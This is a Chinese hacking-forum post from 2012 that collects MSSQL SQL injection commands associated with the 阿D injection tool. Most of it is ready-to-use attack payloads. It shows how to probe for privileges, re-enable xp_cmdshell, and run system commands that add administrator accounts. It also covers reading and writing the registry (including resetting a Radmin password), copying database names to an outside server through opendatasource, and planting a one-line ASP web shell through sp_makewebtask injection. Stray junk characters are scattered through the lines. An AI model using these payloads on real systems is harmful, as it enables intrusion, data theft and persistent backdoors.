找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 阿D常用的一些注入命令
返回列表 发新帖
查看: 2073|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
6 v. O/ Q8 q# ^1 Z//看看是什么权限的4 I' H9 m, \( y. ~0 z/ A( |
and 1=(Select IS_MEMBER('db_owner'))
4 Z4 d% i- i/ ~: @7 C5 `7 yAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
3 M# [% b; j+ U) E% J6 t
  n# ]) U$ L( [5 \$ s//检测是否有读取某数据库的权限
" ?4 H1 w! j- V: ?# F% e7 qand 1= (Select HAS_DBACCESS('master'))
6 E7 p, L3 d  `5 d( f! U) N) VAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --$ @0 m2 r" N. j0 m: E: p8 ]

7 W& a7 d! g- |8 E4 }
: \) @4 O& K6 s7 [数字类型
! |  p! @) U: [$ ^$ v/ a8 d- zand char(124)%2Buser%2Bchar(124)=0+ x$ @  V% o0 ^, B

# |& y$ K, m! n% _: ~& x字符类型2 i8 g# n* H7 `: v9 ^
' and char(124)%2Buser%2Bchar(124)=0 and ''='
! j# H+ [4 Z, e& K: B8 q; k
" e6 k- r6 U5 ]搜索类型2 ~7 L, ^0 [  A' d  o8 [' B5 Q3 i
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
2 f0 a1 I( D# ]  ]8 S
5 e7 ^7 b. d# }& ]* ?爆用户名; J1 I3 k  P9 h, x
and user>0% O" U1 W8 v7 N
' and user>0 and ''='" b1 O, p4 y8 W1 N( o
' H1 c$ j/ `# h0 d
检测是否为SA权限
* ?& [+ W: b% }  ?and 1=(select IS_SRVROLEMEMBER('sysadmin'));--5 ~9 L1 R" \  b7 Y: q' p7 j3 p
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --; K' Z/ _7 M+ R
7 f5 y5 z# X/ J
检测是不是MSSQL数据库
" t$ G* D% q) i9 o3 ?' ^# xand exists (select * from sysobjects);-- 7 o# c0 [2 r9 u

2 |! a; K  a1 y; V1 L. r检测是否支持多行2 J( s  z7 M5 p/ J, ^
;declare @d int;--
6 I7 x& G& H8 C+ ?9 _# B; p3 N
  _- O% ]" E% f2 h- L  a恢复 xp_cmdshell
3 i2 l! n  r* t* [0 a$ v8 w" t: \;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--; @- }- n2 ^7 Z" j& T: W# I* ^- R

% c" w5 S4 U  g: V0 P6 D$ v! {
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') + [: z! G( l# G- D8 H4 H
/ n1 z2 b% G' s0 `0 Y
//-----------------------
+ `- J" ^+ I0 B- |2 y' t3 m//      执行命令
8 Y: w# }6 O' Y7 O& B//-----------------------. R8 j: I4 B6 R' E9 C
首先开启沙盘模式:
5 I! f4 b1 T0 R% x$ R; H( j  Y  mexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',15 Q  `& W5 Z4 e$ [: d. i/ {

6 F' U/ r7 t( o; z" U8 m! y然后利用jet.oledb执行系统命令- g/ f! X$ z& o# b. h& q. Z/ e
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')$ f% g. G  I4 F7 v/ b: L

  O8 e  W6 q% G8 [/ h执行命令
) u) |9 [: ]7 k: ]( [0 `9 W;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
, B% f4 _; V5 [% z$ v  p& A* C6 ]; u: M, F$ c4 p
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
6 Z' ^- J/ d. x7 V
  o* F/ A, O0 }9 U2 \0 o0 f3 {判断xp_cmdshell扩展存储过程是否存在:! ~% R; G5 p4 r6 ~/ _* s+ w* @- A
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')0 V! @: s. y6 n/ h
+ u9 g" Y* e1 |/ B, j: Z
写注册表
1 {' u' R+ q* f* Wexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
& Q0 S2 ~; ?8 y/ G: K' S7 w% q; d( u  S
REG_SZ4 Y$ J& c+ f5 Y- T

/ @+ C% J( ~. j& t读注册表) d* L0 \/ c6 G
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
: Q; b) ^4 p, k  U0 ?8 _; M- h; b% Z( a
读取目录内容0 I3 g9 |4 B/ @. z' U" }8 `, n
exec master..xp_dirtree 'c:\winnt\system32\',1,1
& z7 S0 @+ G- F$ d. D2 l+ e* U7 {! a9 E5 }5 i7 a
; a6 A% d' V4 ?5 }
数据库备份
5 \& G4 M7 Z" n9 Y1 u# nbackup database pubs to disk = 'c:\123.bak', F+ w2 {7 Z0 Q& W$ |0 X& `6 W8 k
5 f  \8 }/ |* I4 M" i* `% q. a
//爆出长度
, D! S& C/ B; ~( ^! N% Q0 x  [And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
6 }+ T, ^$ e" J  t" n# y, ^/ N8 ~# P+ M9 p% y: {
- n. {* F% j- m. K/ K: l( W

6 G7 \& R0 i% o/ z( l( g/ i. I+ z更改sa口令方法:用sql综合利用工具连接后,执行命令:
8 N6 m; [1 F) X6 Jexec sp_password NULL,'新密码','sa'
4 O, y7 R/ n" {5 u. S5 |) d, Q! Z! u" n" p% p" E: \2 S% P3 m
添加和删除一个SA权限的用户test:4 K7 _  _" Y' ?; J% B, G4 O
exec master.dbo.sp_addlogin test,ptlove
; T. A, l# y+ s# p$ @( Lexec master.dbo.sp_addsrvrolemember test,sysadmin/ ^: \4 V2 O1 @' b% m% [& W) w
: }; S* h0 v, D, k$ T3 O9 U
删除扩展存储过过程xp_cmdshell的语句: $ W- F# _3 {9 Y* ~) ^8 p
exec sp_dropextendedproc 'xp_cmdshell'* {& O4 e' N/ d1 b8 m9 c. O  H
2 k; `; z5 _: P
添加扩展存储过过程
+ V5 Q+ X  |8 y! R" \EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' & c, d+ i) N  l5 K
GRANT exec On xp_proxiedadata TO public
; _9 F( J. @7 l, X7 ?+ W- Y+ u7 e

, J: \3 [$ b( f9 ^: A- R停掉或激活某个服务。 + s/ R. P( q" K5 h. d
8 J* _5 t* R: @$ l, T$ b/ N% O
exec master..xp_servicecontrol 'stop','schedule'
& K. U( D" q$ ^  \exec master..xp_servicecontrol 'start','schedule'$ b$ b* d- R" P3 z& ]5 J4 q2 o
" m7 H# Z4 ~+ E7 h6 m6 s0 z, x
dbo.xp_subdirs+ l& y- X7 O8 `- A
+ ?0 n8 q0 @: _$ N/ K
只列某个目录下的子目录。
5 S1 ?; p- g. H2 Q" Txp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
9 j' c7 ]! s$ H6 A% ?+ ~" D. X: c/ Z, I) u& k9 ?6 l
dbo.xp_makecab6 t( u, B* [& d" {. P, G
  P6 \) t. f# ]9 a7 X* J) r8 o
将目标多个档案压缩到某个目标档案之内。
/ k# S' w1 e0 {7 x! q: u/ y所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。& i/ f! A" d" v+ _' Z! j

7 b! V! c; x: ]! Y- Wdbo.xp_makecab
- s8 T- U/ S- R5 ?* I'c:\test.cab','mszip',1,# n) S  y' d: m1 J* G3 J3 j
'C:\Inetpub\wwwroot\SQLInject\login.asp',1 w+ x( V% {9 o8 D
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'/ {: r/ i. h3 o( _: V( J, A' u& Z+ R

5 O$ r: b9 o4 ~. nxp_terminate_process
7 Y5 C3 |# i. S- V! [9 N; M8 X/ \- o7 c# O! x/ @$ B
停掉某个执行中的程序,但赋予的参数是 Process ID。
  Q5 T! _7 A# A, P/ }( y% d% l( U利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID! A7 v% n9 f4 q
% m/ [7 ~9 U, W( g) y6 `6 n
xp_terminate_process 2484
  N" R$ v/ g* @" I( U; f2 [& K7 l/ ~
xp_unpackcab5 @3 A# k4 h& w. k! I! ^! ^' k

- S' y# q4 E; F. Q0 a解开压缩档。
( C+ x3 F( u1 H: D$ t: R/ a! y0 ]9 y4 L, V3 M/ m: K
xp_unpackcab 'c:\test.cab','c:\temp',1
/ k" {5 }. q" u- W; P) _/ l
0 k% r0 s2 E5 U* d# k- x: Z: n
$ o+ e0 Y( Z& X2 u; W0 ?/ [9 G某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
/ m1 \) E  m" J" X" L. [  R/ Z
% }0 `/ F: T$ N0 m7 g5 g% B2 Ecreate database lcx;; ]7 c# B1 L! `* p/ F$ Y7 f
Create TABLE ku(name nvarchar(256) null);
" X- Q7 o  o# f+ bCreate TABLE biao(id int NULL,name nvarchar(256) null);+ ^7 b1 ]3 r& C- L. z
4 l) Y. i/ {1 _0 K5 K, y
//得到数据库名
* ?5 y, h9 [1 `1 y8 J7 winsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases9 X+ W3 I- g0 G4 n5 S( ]/ f
: ~5 E! h2 E: K- b7 ]

; W$ r9 a/ u6 o! ?' F//在Master中创建表,看看权限怎样( ?' S& V  P. N4 k, z
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
2 G+ G; {, L! o$ D# U+ W! F, n3 l: k( p7 z
用 sp_makewebtask直接在web目录里写入一句话马:2 {" h) p# ~6 m) s8 y( {! N
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
1 l" Z1 w4 U# |
% N# J' j9 B  z! ?: _( v//更新表内容9 i" z, J7 v; I
Update films SET kind = 'Dramatic' Where id = 123
: v, [+ [5 q) T" j
" g( ]; z* t& T5 X# \9 t//删除内容  j4 I& G- k0 \$ A$ u, h
delete from table_name where Stockid = 3
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表